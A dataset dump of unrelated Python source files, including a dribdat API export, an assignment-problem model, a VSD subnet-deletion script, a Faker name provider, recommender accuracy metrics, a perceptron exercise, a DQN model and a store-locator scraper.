name='categories',\n            data=get_event_categories(event.id),\n        ))\n    # print(\"Adding supplementary README\")\n    package.add_resource(Resource(\n        name='readme',\n        path='PACKAGE.txt',\n    ))\n\n    # Generate data package\n    fp_package = tempfile.NamedTemporaryFile(\n        prefix='datapackage-', suffix='.zip')\n    # print(\"Saving at\", fp_package.name)\n    if format == 'json':\n        return jsonify(package)\n    elif format == 'zip':\n        package.to_zip(fp_package.name)\n        return send_file(fp_package.name, as_attachment=True)\n","sub_path":"dribdat/public/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":17361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302455016","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import List\nimport numpy as np\nimport os\n\n@dataclass\nclass Assignment:\n    '''\n    Basic class to represent a solution to an assignment problem\n    \n    Attributes:\n    -----------\n    assigned_tasks: List[int]\n        list with assigned tasks; \n        assigned_tasks[2] == 1 means that worker with index 2 has been assigned to task 1\n        value -1 means that the worker has no task assigned\n    objective: int\n        total cost of the assignment\n    '''\n    assigned_tasks: List[int]\n    objective: int\n\n@dataclass\nclass AssignmentProblem:\n    '''\n    Basic class to represent an assignment problem\n    \n    Attributes:\n    -----------\n    name: string\n        name of the problem\n    costs: np.ndarray\n        cost array specific to the problem\n    objective_is_min: bool \n        whether we are looking to minimize costs or maximize profit\n\n    Methods:\n    --------\n    n_tasks() -> int:\n        number of tasks involved in the problem\n    n_workers() -> int:\n        number of workers involved in the problem\n\n    Static Methods:\n    ---------------\n    from_file(path: str) -> AssignmentProblem:\n        creates an instance based on the contents of a file at the given path;\n        the format of the file is simple:\n\n        <min or max> <number of workers> <number of tasks>\n        <costs of the first worker separated by spaces>\n        <costs of the second worker separated by spaces>\n        ....\n        <costs of the last worker separated by spaces>\n    '''\n    name: str\n    costs: np.ndarray\n    objective_is_min: bool \n    \n\n    def n_tasks(self):\n        return self.costs.shape[1]\n\n    def n_workers(self):\n        return self.costs.shape[0]\n\n    @staticmethod\n    def from_file(path: str) -> AssignmentProblem:\n        name = os.path.splitext(os.path.basename(path))[0]\n        costs = None\n        objective_min = True\n\n        with open(path) as f:\n            header = f.readline().split()\n            objective_min = header[0] == \"min\"\n            n_workers, n_tasks = tuple([int(v) for v in header[1:]])\n            costs = np.zeros((n_workers, n_tasks), int)\n            for (i,costs_row) in enumerate(f.readlines()):\n                for (j, cost) in enumerate([int(v) for v in costs_row.split()]):\n                    costs[i,j] = cost\n        return AssignmentProblem(name, costs, objective_min)\n\n@dataclass \nclass NormalizedAssignmentProblem:\n    '''\n    Basic class to represent an assignment problem with a min objective and square cost matrix.\n    It can be created from the normal max non-square problem\n\n    Attributes:\n    -----------\n    costs: np.ndarray\n        a square cost array specific to the problem\n    original_problem: AssignmentProblem \n        the original problem that has been used to create the instance\n\n    Methods:\n    --------\n    size() -> int:\n        size of the problem (number of workers/tasks)\n\n    Static Methods:\n    ---------------\n    from_problem(problem: AssignmentProblem) -> NormalizedAssignmentProblem:\n        creates an instance based on the possibly non-square, non-min assignment problem\n    ''' \n    costs: np.ndarray\n    original_problem: AssignmentProblem\n\n    def size(self) -> int:\n        return self.costs.shape[0]\n\n    @staticmethod\n    def from_problem(problem: AssignmentProblem) -> 
NormalizedAssignmentProblem:\n        #TODO:\n        # 1) create a square matrix big enough to fit the original cost matrix\n        # 2) copy the original matrix into the new one, inverting the costs if the original problem was a maximization problem\n        # 3) extra rows and cols should always be filled with 0s\n        # tip: inverting the costs means that you should subtract the original cost from the maximal cost in the matrix\n        shape = problem.costs.shape\n        max_size = np.max([shape[0], shape[1]])\n        max_value = np.max(problem.costs)\n\n        normalized_cost = np.zeros((max_size, max_size), dtype=int)\n\n        for i in range(problem.costs.shape[0]):\n            for j in range(problem.costs.shape[1]):\n                if problem.objective_is_min:\n                    normalized_cost[i, j] = problem.costs[i, j]\n                else:\n                    normalized_cost[i, j] = max_value - problem.costs[i, j]\n\n        return NormalizedAssignmentProblem(normalized_cost, problem)\n","sub_path":"LAB_10/lab10_assignment_problem/saport/assignment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"186914841","text":"# Copyright 2016 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom vspk.v4_0 import NUVSDSession\nimport yaml\nimport sys\nimport argparse\n\n\ndef get_zone_obj(csp_user, org_name='Nuage_Partition1',\n                 l3_domain_name='oc-heat-test'):\n    csproot = csp_user\n    org = csproot.enterprises.get_first(filter=\"name=='%s'\" % org_name)\n    if org.name != org_name:\n        print(\"ERROR: Could not find %s org in VSD\" % org_name)\n        sys.exit(1)\n    l3_domain = org.domains.get_first(filter=\"name=='%s'\" % l3_domain_name)\n    if l3_domain.name != l3_domain_name:\n        print(\"ERROR: Could not find %s domain in VSD\" % l3_domain_name)\n        sys.exit(1)\n    zone = l3_domain.zones.get_first(filter=\"name=='%s'\"\n                                     % vsd_constants['zone_name'])\n\n    return (zone)\n\n\ndef delete_subnet(network_name, zone):\n    network = zone.subnets.get_first(filter=\"name=='%s'\" % network_name)\n    if network is None:\n        print(\"%s network does not exist to delete\" % network_name)\n        sys.exit(1)\n    if network.name != network_name:\n        print(\"ERROR: Could not delete %s network on VSD or network does\\\n         not exist\" % network_name)\n        sys.exit(1)\n    network.delete()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"playbook_dir\", type=str,\n                        help=\"Path to playbook directory.\")\n    parser.add_argument(\"subnet_name\", type=str, default=None,\n                        help=\"VSD subnet name to delete.\")\n    args = parser.parse_args()\n\n    # Get vsd related parameters\n    try:\n        with open(args.playbook_dir + '/roles/ci-predeploy/vars/main.yml',\n                  'r') as fo:\n            vsd_constants = yaml.safe_load(fo)\n    except Exception as e:\n        print(\"ERROR: Could not locate file: %s\" % e)\n\n    # Create a session as csp user\n    try:\n        session = NUVSDSession(**vsd_constants['csp'])\n        session.start()\n        csproot = session.user\n    except Exception:\n        print(\"ERROR: Could not establish connection to VSD API\")\n        sys.exit(1)\n\n    # Get zone\n    zone_obj = 
get_zone_obj(csproot, vsd_constants['org_name'],\n vsd_constants['domain_name'])\n\n # Delete subnet\n del_subnet_name = args.subnet_name\n delete_subnet(del_subnet_name, zone_obj)\n print(\"Deleted subnet %s from VSD\" % del_subnet_name)\n","sub_path":"scripts/delete_subnet.py","file_name":"delete_subnet.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"178904074","text":"# coding=utf-8\n\nfrom __future__ import unicode_literals\nfrom .. import Provider as PersonProvider\n\n\nclass Provider(PersonProvider):\n formats = (\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n )\n\n first_names_male = (\n 'Carlos',\n 'Daniel',\n 'Eduardo',\n 'Angel',\n 'Jose',\n 'Diego',\n 'Jorge',\n 'Luis',\n 'Fernando',\n 'Alejandro',\n 'Sergio',\n 'Juan',\n 'Arturo',\n 'Christian',\n 'Jesus',\n 'David',\n 'Enrique',\n 'Isaac',\n 'Emmanuel',\n 'Ivan',\n 'Roberto',\n 'Cesar',\n 'Oscar',\n 'Alan',\n 'Edgar',\n 'Adrian',\n 'Juan Carlos',\n 'Alex',\n 'Antonio',\n 'Armando',\n 'Rafael',\n 'Alberto',\n 'Rodrigo',\n 'Alexis',\n 'Jonathan',\n 'Ricardo',\n 'Mauricio',\n 'José Luis',\n 'Erick',\n 'Hector',\n 'Andrès',\n 'Julio',\n 'Miguel',\n 'Leonardo',\n 'Victor',\n 'P.',\n 'Salvador',\n 'Ruben',\n 'K.',\n 'F.',\n 'Mario',\n 'Mariana',\n 'Luis Fernando',\n 'Brandon',\n 'Max',\n 'Joaquín',\n 'Humberto',\n 'Hibram',\n 'Cristian',\n 'Gerardo',\n 'B.',\n 'H.',\n 'R.',\n 'A.',\n\n\n\n )\n\n first_names_female = (\n 'Andrea',\n 'Fernanda',\n 'Diana',\n 'Daniela',\n 'Mariana',\n 'Ana',\n 'Alejandra',\n 'Maria',\n 'Karla',\n 'Adriana',\n 'Gabriela',\n 'Samantha',\n 'Brenda',\n 'Jazmin',\n 'Elizabeth',\n 'Rosa',\n 'Itzel',\n 'Melissa',\n 'Viridiana',\n 'Gaby',\n 'Laura',\n 'Jessica',\n 'Michelle',\n 'Paola',\n 'Esmeralda',\n 'Paula',\n 'Sara',\n 'Karen',\n 'Tania',\n 'Claudia',\n 'Frida',\n 'Miriam',\n 'Carolina',\n 'Estefania',\n 'Leticia',\n 'Dafne',\n 'Paulina',\n 'Perla',\n 'Alma',\n 'Cecilia',\n 'Fanny',\n 'Natalia',\n 'Valeria',\n 'Marian',\n 'Ximena',\n 'Karina',\n 'Lupita',\n 'Jennifer',\n 'Flor',\n 'Rocio',\n 'Denisse',\n 'Dulce',\n 'Yazmin',\n 'Alexa',\n 'Marisol',\n 'Ali',\n 'Alondra',\n 'Rebeca',\n 'Sandra',\n 'Marcela',\n 'Violeta',\n 'Clarisa',\n 'Victoria',\n 'Lizeth',\n\n\n\n\n )\n\n first_names = first_names_male + first_names_female\n\n last_names = (\n 'Garcia',\n 'Rodriguez',\n 'Martinez',\n 'Hernandez',\n 'Lopez',\n 'Gonzalez',\n 'Perez',\n 'Sanchez',\n 'Ramirez',\n 'Torres',\n 'Flores',\n 'Rivera',\n 'Gomez',\n 'Diaz',\n 'Reyes',\n 'Morales',\n 'Cruz',\n 'Ortiz',\n 'Gutierrez',\n 'Chavez',\n 'Ramos',\n 'Gonzales',\n 'Ruiz',\n 'Alvarez',\n 'Mendoza',\n 'Vasquez',\n 'Castillo',\n 'Jimenez',\n 'Moreno',\n 'Romero',\n 'Herrera',\n 'Medina',\n 'Aguilar',\n 'Garza',\n 'Castro',\n 'Vargas',\n 'Fernandez',\n 'Guzman',\n 'Munoz',\n 'Mendez',\n 'Salazar',\n 'Soto',\n 'Delgado',\n 'P.',\n 'Rios',\n 'Alvarado',\n 'Sandoval',\n 'C.',\n 'Valdez',\n 'Guerrero',\n 'Ortega',\n 'Estrada',\n 'Nunez',\n 'Maldonado',\n 'Vega',\n 'Vazquez',\n 'Santiago',\n 'Dominguez',\n 'Espinoza',\n 'Silva',\n 'R.',\n 'Marquez',\n 'Cortez',\n 'Rojas',\n\n\n\n\n )\n\n prefixes_male = (\n\n )\n prefixes_female = (\n\n )\n\n suffixes = 
()\n","sub_path":"faker/providers/person/es_CO/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"451134588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom collections import defaultdict\nimport numpy as np\nfrom six import iteritems\n\n\ndef rmse(predictions, verbose=True):\n \"\"\"Compute RMSE (Root Mean Squared Error).\n .. math::\n \\\\text{RMSE} = \\\\sqrt{\\\\frac{1}{|\\\\hat{R}|} \\\\sum_{\\\\hat{r}_{ui} \\in\n \\\\hat{R}}(r_{ui} - \\\\hat{r}_{ui})^2}.\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. Default is ``True``.\n Returns:\n The Root Mean Squared Error of predictions.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n mse = np.mean([float((true_r - est)**2)\n for (_, _, true_r, est, _) in predictions])\n rmse_ = np.sqrt(mse)\n\n if verbose:\n print('RMSE: {0:1.4f}'.format(rmse_))\n\n return rmse_\n\n\ndef _rmspe_denom(y):\n \"\"\" Calculate denominator of rmspe consider 0 division.\n Attr\n --------------\n y np.array actual values's array\n\n Return\n --------------\n w np.array denom of rmspe\n \"\"\"\n\n w = np.zeros(y.shape, dtype=float)\n ind = y != 0\n w[ind] = 1. / (y[ind]**2)\n\n return w\n\n\ndef rmspe(predictions, verbose=True):\n \"\"\" Calcuate rmse and rmspe from surprise's result.\n Attr\n --------------\n pred prediction object of surprise\n\n Return\n --------------\n rmspe float\n \"\"\"\n # rmspe\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n # rmspe\n actuals = np.array([])\n predicts = np.array([])\n for uid, iid, true_r, est, _ in predictions:\n actuals = np.append(actuals, np.array([true_r]))\n predicts = np.append(predicts, np.array([est]))\n\n act_w = _rmspe_denom(actuals)\n rmspe = np.sqrt(np.mean(act_w * (actuals - predicts)**2))\n\n if verbose:\n print('RMSPE: {0:1.4f}'.format(rmspe))\n\n return rmspe\n\n\ndef mae(predictions, verbose=True):\n \"\"\"Compute MAE (Mean Absolute Error).\n .. math::\n \\\\text{MAE} = \\\\frac{1}{|\\\\hat{R}|} \\\\sum_{\\\\hat{r}_{ui} \\in\n \\\\hat{R}}|r_{ui} - \\\\hat{r}_{ui}|\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. Default is ``True``.\n Returns:\n The Mean Absolute Error of predictions.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n mae_ = np.mean([float(abs(true_r - est))\n for (_, _, true_r, est, _) in predictions])\n\n if verbose:\n print('MAE: {0:1.4f}'.format(mae_))\n\n return mae_\n\n\ndef fcp(predictions, verbose=True):\n \"\"\"Compute FCP (Fraction of Concordant Pairs).\n Computed as described in paper `Collaborative Filtering on Ordinal User\n Feedback `_ by Koren\n and Sill, section 5.2.\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. 
Default is ``True``.\n Returns:\n The Fraction of Concordant Pairs.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n predictions_u = defaultdict(list)\n nc_u = defaultdict(int)\n nd_u = defaultdict(int)\n\n for u0, _, r0, est, _ in predictions:\n predictions_u[u0].append((r0, est))\n\n for u0, preds in iteritems(predictions_u):\n for r0i, esti in preds:\n for r0j, estj in preds:\n if esti > estj and r0i > r0j:\n nc_u[u0] += 1\n if esti >= estj and r0i < r0j:\n nd_u[u0] += 1\n\n nc = np.mean(list(nc_u.values())) if nc_u else 0\n nd = np.mean(list(nd_u.values())) if nd_u else 0\n\n try:\n fcp = nc / (nc + nd)\n except ZeroDivisionError:\n raise ValueError('cannot compute fcp on this list of prediction. ' +\n 'Does every user have at least two predictions?')\n\n if verbose:\n print('FCP: {0:1.4f}'.format(fcp))\n\n return fcp\n","sub_path":"extentions/surprise/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"465147645","text":"# -*- coding: utf-8 -*-\r\nimport csv\r\nimport os\r\nimport pandas as pd\r\nimport pandas\r\nfrom openpyxl import load_workbook\r\n\r\ndef Generator(fpath):\r\n xls = pd.read_excel(fpath,sheet_name='actual pre-code')\r\n xls.to_csv('./tools/Generator/csv/node.csv', index=False)\r\n\r\n with open('./tools/Generator/csv/node.csv', 'rb') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader)\r\n column = [row[1] for row in reader]\r\n\r\n for num,node in enumerate(column):\r\n with open('./tools/Generator/csv/node.csv', 'rb') as csvfile:\r\n reader = csv.DictReader(csvfile)\r\n for row in reader:\r\n if row['NODE Name'] == node:\r\n b = [row['Pre-code']]\r\n for element in b:\r\n parts = element.split(',')\r\n filen = './tools/Generator/plan/NODE %d.xlsx'%(num+1)\r\n wb = load_workbook(filename = filen)\r\n ws = wb['Case']\r\n for i,j in enumerate(parts):\r\n col = 'B%s'%(i+2)\r\n ws[col] = j\r\n wb.save(filen)","sub_path":"tools/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"221666177","text":"# -- coding: utf-8 --\n\"\"\"\nCreated on Fri May 10 10:52:34 2019\n\n@author: דוד רגב\n\"\"\"\n\n# importing the libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import argmax\n\ndef MinMaxNorm(data):\n data_max = np.max(data, axis=0)\n data_min = np.min(data, axis=0)\n\n lines = len(data)\n cols = len(data[0])\n\n for i in range(lines):\n for j in range(cols):\n if((data_max[j] - data_min[j])!=0):\n data[i][j] = (data[i][j] - data_min[j]) / (data_max[j] - data_min[j])\n\ndef zscor(data):\n data_mean = np.mean(data, axis=0)\n data_std = np.std(data, axis=0)\n\n lines = len(data)\n cols = len(data[0])\n\n for i in range(lines):\n for j in range(cols):\n if ((data_std[j]) != 0):\n data[i][j] = (data[i][j] - data_mean[j]) / (data_std[j])\n return data\ndef perc_learning(x_train, y_train, eta, num_iter):\n w = np.zeros((3, x_train.shape[1])) # TODO - how to get 3 generically\n for i in range(num_iter):\n #indexes = np.random.permutation(x_train.shape[0])\n #x_train, y_train = x_train[indexes], y_train[indexes]\n for x, y in zip(x_train, y_train):\n # for i in range(x_train.shape[0]):\n y_hat = np.argmax(np.dot(w, x))\n if y_hat != 
y:\n w[int(y), :] = w[int(y), :] + eta * x\n w[y_hat, :] = w[y_hat, :] - eta * x\n return w\n\n\ndef perc_test(x_test, y_test, w):\n count = 0\n for x, y in zip(x_test, y_test):\n y_pred = np.argmax(np.dot(w, x))\n if y_pred == y:\n count = count + 1\n return count\n\n\ndef perceptron(X, Y, eta, num_iter):\n success = []\n for i in range(10):\n # arrange the data\n x_train, y_train, x_test, y_test = split_data(X, Y, i)\n\n # teach the model\n w = perc_learning(x_train, y_train, eta, num_iter)\n # print(\"iter {}\".format(i), w)\n # check the model\n count = perc_test(x_test, y_test, w)\n perc = count / y_test.shape[0]\n success.append(perc)\n\n pred_perc = np.mean(success)\n pred_var = np.var(success)\n\n return pred_perc, pred_var\n\n\ndef preperation(X):\n X = encoder(X)\n #X = MinMaxNorm(X)\n X = np.array(X)\n return X\n\n\ndef split_data(X, Y, test):\n # X = X.rename_axis('ID')\n # X = X.values\n Y = Y.rename_axis('ID')\n Y = Y.values\n X_size = X.shape\n triningX = []\n testX = []\n for i in range(10):\n if i != test:\n for j in range(int((i * X_size[0]) / 10), int(((i + 1) * X_size[0]) / 10)):\n triningX.append(X[j])\n\n for j in range(int(test * X_size[0] / 10), int((test + 1) * X_size[0] / 10)):\n testX.append(X[j])\n\n Y_size = Y.shape\n triningY = []\n testY = []\n for i in range(10):\n if i != test:\n for j in range(int(i * Y_size[0] / 10), int((i + 1) * Y_size[0] / 10)):\n triningY.append(Y[j])\n\n for j in range(int(test * Y_size[0] / 10), int((test + 1) * Y_size[0] / 10)):\n testY.append(Y[j])\n\n triningX = np.array(triningX)\n testX = np.array(testX)\n triningY = np.array(triningY)\n testY = np.array(testY)\n\n return triningX, triningY, testX, testY\n\n\ndef encoder(X):\n # define universe of possible input values\n X = X.rename_axis('ID')\n X = X.values\n arrayGender = []\n matrix_size = X.shape\n ganderCol = -1\n\n for i in range(matrix_size[1]):\n\n if type(X[0][i]) == str:\n ganderCol = i\n break\n\n if (ganderCol == -1):\n return X\n\n for i in range(matrix_size[0]):\n if X[i][ganderCol] in arrayGender:\n continue\n arrayGender.append(X[i][ganderCol])\n\n arrayForReplaceGander = []\n new = []\n for i in range(matrix_size[0]):\n for j in range(len(arrayGender)):\n new.append(0)\n for j in range(ganderCol):\n new.append(X[i][j])\n for j in range(ganderCol + 1, matrix_size[1]):\n new.append(X[i][j])\n new.append(1)\n arrayForReplaceGander.append(new)\n new = []\n\n for i in range(matrix_size[0]):\n arrayForReplaceGander[i][arrayGender.index(X[i][ganderCol])] = 1\n\n return arrayForReplaceGander\n\n\ndef plot_grid(X, Y, Z, xlabel, ylabel, zlabel ):\n #Axes3D = Axes3D\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n surf = ax.plot_trisurf(X, Y, Z, cmap=plt.cm.RdYlGn, linewidth=0)\n fig.colorbar(surf)\n\n #ax.xaxis.set_major_locator(plt.ticker.MaxNLocator(5))\n #ax.yaxis.set_major_locator(plt.ticker.MaxNLocator(6))\n #ax.zaxis.set_major_locator(plt.ticker.MaxNLocator(5))\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_zlabel(zlabel)\n\n fig.tight_layout()\n\n plt.show()\n\n\ndef main():\n X = pd.read_csv('train_x.txt', sep=\",\", header=None)\n # X.columns = ['Sex', 'Length', 'Diameter', 'Height', 'Whole weight',\n # 'shucked weight', 'Viscera weight', 'shell weight']\n Y = pd.read_csv('train_y.txt', header=None)\n # Y.columns = ['Label']\n\n # prepare the data for learning (e.i. 
using one-hot encoder)\n    X = preperation(X)\n\n    array_eta = []\n    array_iter = []\n    array_pred_perc = []\n\n\n    array_pred_var = []\n    for num_iter in range(1, 20):\n        #for i in range(1,10000,100):\n        #    eta = 0.0001*(10**i)\n        eta = 10000000\n        pred_perc, pred_var = perceptron(X, Y, eta, num_iter)\n        array_eta.append(eta)\n        array_iter.append(num_iter)\n        array_pred_perc.append(pred_perc * 100)\n        array_pred_var.append(pred_var)\n\n    plt.figure()\n    plt.plot(array_iter, array_pred_perc)\n    plt.show()\n    plt.figure()\n    plt.plot(array_iter, array_pred_var)\n    plt.show()\n    #plot_grid(array_eta, array_iter, array_pred_perc, \"eta\", \"epochs\", \"success rate\")\n    #plot_grid(array_eta, array_iter, array_pred_var, \"eta\", \"epochs\", \"variance\")\n\n\nmain()","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"258275919","text":"# The range of values is huge, so exhaustive search is impractical\n# What we binary-search over: how much time to allow a single examiner\n# Take the best and worst possible total times, then test the midpoint for feasibility\n# Count how many people each examiner can process within mid time\n# If more than n people can be examined, shrink the time; if fewer than n, grow it.\ndef solution(n, times):\n    # worst-case total time\n    right = max(times) * n\n    left = 0\n\n    while left <= right:\n        # time allowed per examiner\n        mid = (right + left) // 2\n\n        # how many people get examined within that time\n        people = 0\n        for i in times:\n            # accumulate how many people the current examiner can handle in mid time\n            people += mid//i\n\n        # everyone can be examined: remember this time,\n        # then keep narrowing to find the minimum feasible value\n        if people >= n:\n            answer = mid\n            right = mid - 1\n\n        # not everyone can be examined\n        if people < n:\n            left = mid + 1\n\n    return answer\n\n\nprint(solution(6, [7, 10]))\n","sub_path":"프로그래머스/3단계/입국심사.py","file_name":"입국심사.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"312045098","text":"import sys\n\nwf = open('dif.dat', 'w')\norig = open('CrossSections_rebin.dat').readlines()\ntpe = open('mainz_rebin_tpe.dat').readlines()\nnew = open('CrossSections_rebin_staterror_corrsys.dat').readlines()\n\ni = 0\nfor line in open('CrossSections_rebin_staterror_old.dat'):\n    l = line.split()\n    origl = orig[i].split()\n    tpel = tpe[i].split()\n    newl = new[i].split()\n\n    #if float(l[2]) != float(origl[2]):\n    #    print >> wf, i, ' th'\n    #if float(l[3]) != float(origl[3]):\n    #    print >> wf, i, ' Q2'\n    #if float(l[4]) != float(origl[4]):\n    #    print >> wf, i, ' xs'\n    #if float(l[5]) != float(origl[5]):\n    #    print >> wf, i, ' dxs'\n\n    #if float(l[2]) != float(tpel[2]):\n    #    print >> wf, i, ' th'\n    #if float(l[3]) != float(tpel[3]):\n    #    print >> wf, i, ' Q2'\n\n    if float(l[2]) != float(newl[2]):\n        print >> wf, i, ' th'\n    if float(l[3]) != float(newl[3]):\n        print >> wf, i, ' Q2'\n    if float(l[4]) != float(newl[4]):\n        print >> wf, i, ' xs'\n    if float(l[5]) != float(newl[5]):\n        print >> wf, i, ' dxs'\n    if float(l[8]) != float(newl[8]):\n        print >> wf, i, ' xsmin'\n    if float(l[9]) != float(newl[9]):\n        print >> wf, i, ' xsmax'\n    \n    i += 1\n    \n\n\n    \n","sub_path":"Charge_radius/final_analyses/fitdata/rebin/check_tpe.py","file_name":"check_tpe.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"40258620","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass QNetwork(nn.Module):\n    \"\"\"Actor (Policy) Model.\"\"\"\n\n    def __init__(self, state_size, action_size, seed):\n        \"\"\"Initialize parameters and build model.\n        Params\n        ======\n            state_size (int): Dimension of each state\n            
action_size (int): Dimension of each action\n seed (int): Random seed\n \"\"\"\n print(\"HI\")\n super(QNetwork, self).__init__()\n self.seed = torch.manual_seed(seed)\n \"*** YOUR CODE HERE ***\"\n\n # self.conv1 = nn.Conv2d(4, 32, (8,8), 4)\n # self.conv2 = nn.Conv2d(32, 64, (4,4), 2)\n # self.conv3 = nn.Conv2d(64, 64, (3,3), 1)\n # self.fc1 = nn.Linear(2304, 512)\n # self.fc2 = nn.Linear(512, action_size)\n self.fc1 = nn.Linear(state_size, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, action_size)\n\n def forward(self, state):\n \"\"\"Build a network that maps state -> action values.\"\"\"\n # print(state)\n # x = F.relu(self.conv1(state))\n # x = F.relu(self.conv2(x))\n # x = F.relu(self.conv3(x))\n # x = x.view(-1, 6*6*64)\n # x = F.relu(self.fc1(x))\n # x = self.fc2(x)\n x = F.relu(self.fc1(state))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n","sub_path":"dqn/exercise/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"395754858","text":"import json\n\nimport scrapy\n\nfrom locations.items import Feature\n\nDAYS = {\n \"Monday\": \"Mo\",\n \"Tuesday\": \"Tu\",\n \"Wednesday\": \"We\",\n \"Friday\": \"Fr\",\n \"Thursday\": \"Th\",\n \"Saturday\": \"Sa\",\n \"Sunday\": \"Su\",\n}\n\n\nclass SunLoanSpider(scrapy.Spider):\n name = \"sunloan\"\n item_attributes = {\"brand\": \"Sun Loan\"}\n allowed_domains = [\"sunloan.com\"]\n start_urls = (\"https://www.sunloan.com/locations/\",)\n download_delay = 0.5\n\n def parse(self, response):\n urls = response.xpath(\n '//div[@id=\"custom-locations-2\"]//div[@class=\"location-box\"]/div/p/strong/a/@href'\n ).extract()\n\n for url in urls:\n yield scrapy.Request(response.urljoin(url), callback=self.parse_store)\n\n def parse_store(self, response):\n try:\n data = response.xpath('//script[contains(text(),\"latitude\")]/text()').extract_first()\n data = json.loads(data)\n except TypeError:\n return\n except json.JSONDecodeError:\n data = data.replace('\"hasMap\": \\r\\n', \"\")\n data = json.loads(data)\n if not data:\n return\n\n properties = {\n \"lat\": float(data[\"geo\"][\"latitude\"]),\n \"lon\": float(data[\"geo\"][\"longitude\"]),\n \"website\": response.url,\n \"ref\": response.url,\n \"addr_full\": data[\"address\"][\"streetAddress\"],\n \"city\": data[\"address\"][\"addressLocality\"],\n \"state\": data[\"address\"][\"addressRegion\"],\n \"postcode\": data[\"address\"][\"postalCode\"],\n \"country\": \"US\",\n \"name\": data[\"name\"],\n }\n\n try:\n hours = data[\"openingHours\"]\n if hours:\n properties[\"opening_hours\"] = hours\n except:\n pass\n\n yield Feature(**properties)\n\n # yield Feature(\n # lat=float(data['geo']['latitude']),\n # lon=float(data['geo']['longitude']),\n # website=response.url,\n # ref=response.url,\n # #opening_hours=data['openingHours'],\n # addr_full=data['address']['streetAddress'],\n # city=data['address']['addressLocality'],\n # state=data['address']['addressRegion'],\n # postcode=data['address']['postalCode'],\n # country='US',\n # name=data['name'],\n # )\n","sub_path":"locations/spiders/sunloan.py","file_name":"sunloan.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"606733382","text":"from urllib.parse import quote\n\nfrom pandas_profiling.report.presentation.core import HTML, Table, Sequence, Warnings\n\n\ndef get_dataset_overview(summary):\n 
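# Build the two Overview tables: whole-table statistics and per-type variable counts\n    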
